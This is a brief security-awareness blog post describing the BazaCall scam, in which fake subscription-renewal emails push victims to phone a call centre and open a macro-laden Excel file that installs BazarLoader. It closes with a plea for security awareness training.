Unlike traditional phishing emails that simply attach or link to a malicious file, a new scam from cybercriminal group BazaCall makes victims call in and be instructed to download the malware.
It seems a bit counterintuitive; instead of just phishing the victim with a malicious attachment, let’s make them interact with a call center who will then convince them to open a malicious Excel file. But, according to Microsoft Security Intelligence, this is exactly what the folks at BazaCall are doing.
Using a phishing email themed around a fictitious software trial being over in 24 hours and the potential victim needing to pay for the software if they don’t cancel, BazaCall trick victims into calling in to cancel the “subscription” they know nothing about.
During the call, the victim is instructed to download a malicious Excel file that contains a macro which downloads the malware BazarLoader. This group has also been observed using Cobalt Strike penetration testing kit to steal credentials and move laterally within the victim networks.
While the added step of making someone call a scammer on the phone just to do the equivalent of double-clicking an attachment seems ludicrous, this does add credibility to the process and may lower the victims defenses long enough for the malicious Excel file to do its’ work.
This scam is actually pretty smart, as it goes to such lengths to establish itself as legitimate that someone who wouldn’t fall for an email saying “you owe us money – see the attachment” may actually fall for this one. It’s one of the reasons Security Awareness Training is so important. Users need to be continually educated on the latest scams, methods, and social engineering tactics used to ensure they are always on guard.